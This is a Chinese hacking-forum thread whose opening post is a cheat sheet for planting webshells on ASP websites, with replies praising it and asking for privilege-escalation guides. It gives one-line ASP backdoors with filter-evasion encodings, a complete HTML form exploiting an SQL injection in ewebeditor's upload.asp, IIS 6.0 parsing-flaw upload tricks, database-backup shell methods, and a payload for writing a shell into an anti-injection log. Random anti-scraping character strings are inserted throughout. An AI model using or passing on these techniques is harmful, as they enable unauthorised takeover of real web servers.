返回列表 发帖

[原创文章] asp拿shell

1.有备份,上传图片备份。如不能修改文件后缀名,可备份成1.asp/1.mdb或1.asa/1.mdb的形式
: r# Y3 \# N% \# b3 \/ J% D5 [. F, X: t
2.写入配置文件一句话木马,如果过滤了<,%,>,(,)可尝试&#60;&#37;eval request&#40;&#34;value&#34;&#41;&#37;&#62;来突破,例如config.asp& j$ T: G# R! X7 K3 A4 c0 Z
, W* o1 q, x' `0 h- o: M& }# O9 [
3.上传漏洞:
( T0 I( A. H, Z, X# Q
( }: j# `; c3 w, n0 g% {动网上传漏洞:抓包nc提交,其中路径可改为zjq.asp 的形式,空格替换成0x00
2 Q6 F( J) y- d$ K$ \9 c. N# `, _2 |8 P
逻辑上传漏洞:同时上传两个文件,第一个为正常文件,第二个为iis可解析后缀文件
, \0 r4 l! S0 W4 R- r9 |9 h0 e* L
' w3 ]( }  a6 D8 B9 e雷池上传漏洞:http://localhost/leichinews/admin/uploadPic.asp?actionType=mod&picName=test.asp' y& A# _  p( O6 \) U# G4 _
然后在上传文件里面填要传的图片格式的ASP木马
9 g& o  C) |1 x$ p8 ]2 _就可以在uppic目录下上传文件名为test.asp的文件uppic/test.asp
( G  X* K2 b% S' Z$ N3 x4.ewebeditor:有后台添加asa或aaspsp上传类型,前提要进入后台。没后台如2.16版本可利用如下代码上传
( ?- }* s9 R- R& w1 [/ E' z8 e2 B; \+ G5 \( Y
<html>
4 y- }4 U$ z9 a9 m' [0 h/ @<head>
5 d2 h) K' ]) S" _# H<title>ewebeditor upload.asp上传利用</title>  g! g# l+ R( K+ v4 s/ {
</head>
' N2 l" ]) q8 b% n; p7 H6 s: [<body>$ p+ f% y- L+ g0 A
<form action="upload.asp?action=save&type=IMAGE&style=luoye' union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard' and 'a'='a" method=post name=myform enctype="multipart/form-data">- |7 d8 X$ q: M# c
<input type=file name=uploadfile size=100><br><br>+ [" t9 f' k* J' r) I4 k+ D
<input type=submit value=Fuck>
& R0 {2 J# B4 E* E: S2 z</form>6 A9 e" `. k6 F9 N8 C0 G
</body>  @% `  i7 s& W7 `( k
</form>- ~9 e3 I" B% h0 `
</html>
1 X) J2 c2 [) r" X0 V; \4 s
; n2 P% @! D$ L! w% n$ {% k- V2.8般亦可以利用admin_uploadfile.asp?id=14&dir=..列目录,前提是此文件可访问,或cookie欺骗后可访问! I' p4 X) Z* {
5.fckeditor:/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp
3 x7 w6 g; ?. m, X, _, l0 m( }- X4 f! t( i
利用windows2003解析。建立zjq.asp的文件夹
4 {. c$ \3 \' ]/ F& j
) s5 K  O+ g7 x9 R, l0 x% \6.southidceditor:admin/SouthidcEditor/Admin_Style.asp?action=styleset&id=47。修改上传类型$ T0 K% [6 [, N+ c/ k' S

, U" f0 _( ?$ k* W. P; i7.cuteeditor:类似ewebeditor7 `% ~3 `* _8 D4 {5 o5 m" s
* A3 D1 O. j& n. V! O% X
8.htmleditor:同上( t& N2 c  r, J, I; V+ f2 G

. B$ g8 Z: U# R9.插数据库一句话。前提是知道数据库路径,为asp,asa等后缀,无防下载表,有防下载表可尝试插入以下语句突破: ^2 m+ R0 n4 p- z. I2 ~

! o9 L4 |3 V4 I' p" [3 b% d<%execute request("value")%><%'<% loop <%:%>: B* n0 V0 c. P/ ]
- x* z2 {( K# M3 U! @
<%'<% loop <%:%><%execute request("value")%>
! g/ C3 u  ~% ?0 a& q# |. c! e: E% r! G# e! t
<%execute request("value")'<% loop <%:%>
5 s% p+ V! p: |, \% w8 z5 U7 \/ k9.查看cookie,看上传路径是否为cookie记录,可修改为*.asp的形式,利用2003解析漏洞- a6 I4 a2 S& l* y0 ~( N
! \7 P3 ?6 Q& y3 i7 C: i
10.上传不重命名文件,可上传zjq.asp;zjq.jpg的文件,iis6.0解析漏洞4 Q* ]* X) K) V  f3 Y2 b/ r, n
5 d' a$ }2 `3 j& K2 [# ^+ X% R
11.注册用户名为zjq.asp,前提是网站会根据用户名新建一个以用户名命名的文件夹,上传正常图片木马,利用2k3
0 p8 S: {8 L, _" `0 R5 n% l7 F3 v1 N, `" R
解析漏洞得到webshell$ R& z/ N1 R+ [
# s8 Q5 H( \$ r9 r0 D
12.mssql差异备份,日志备份,前提需知道web路径! Y  J& c1 r# Q8 P" J
9 ?6 d& U& j" u3 L$ a9 a
13.先备份数据库(拿到shell便于恢复网站访问),上传图片shell,数据库为asp,asa等后缀,恢复数据库填写图片路径,速度要快,因为恢复完网站就不能正常访问,一句话连接得webshell; p# o3 V! r+ l0 r, Q) p; |
" u$ a, f5 j# r4 U5 N6 Y, S, j3 u; `
14.添加上传类型php,并上传phpshell,前提服务器能解析php,例如dvbbs8.2后台拿shell8 `; h/ A. v  t! T3 c& I

; y; L; [9 _- K3 x4 [* d9 h1 ]# K8 F15.有些系统用的是防注入程序,数据库默认为sqlin.asp,我们可以www.xx.com/*.asp?id=1'<script language=VBScript runat=server>execute(request("zjq"))</Script>,这样就会在sqlin.asp中写入一句话shell,连接即可
0 j3 J9 u8 b- C; y+ C
+ e% ]9 X+ J7 n, E& H以上只是本人的一些拙见,并不完善,以后想到了再继续添加* V( ~$ m! |& X# ~1 V+ f
不是我原创。我的朋友,飞鸟游鱼原创的
2

评分人数

  • 1335csy

  • 超超

谢谢楼主分享技术。。。

TOP

不错哦 呵呵 学习了

TOP

提权才是王道。

TOP

1# yyw258520 5 }7 @, K2 }. r6 b0 B! x4 |4 j
; @5 S" b4 V$ i) m

# |  X& W8 V7 j! P: ?- E4 l很好啊、基本的入侵方法都包含了2 q3 N* U7 I, e5 `7 k

/ i2 j" Q3 w9 n' q' E, Q最好来个提权的帖子再。& b% Y. L9 s- }1 |

# a: O4 ]- {, e4 r! m- ?2 @: h; u不要网上百度的。

TOP

写的很不错

TOP

kankankankan
1

TOP

好东西能分享 谢谢!!!

TOP

返回列表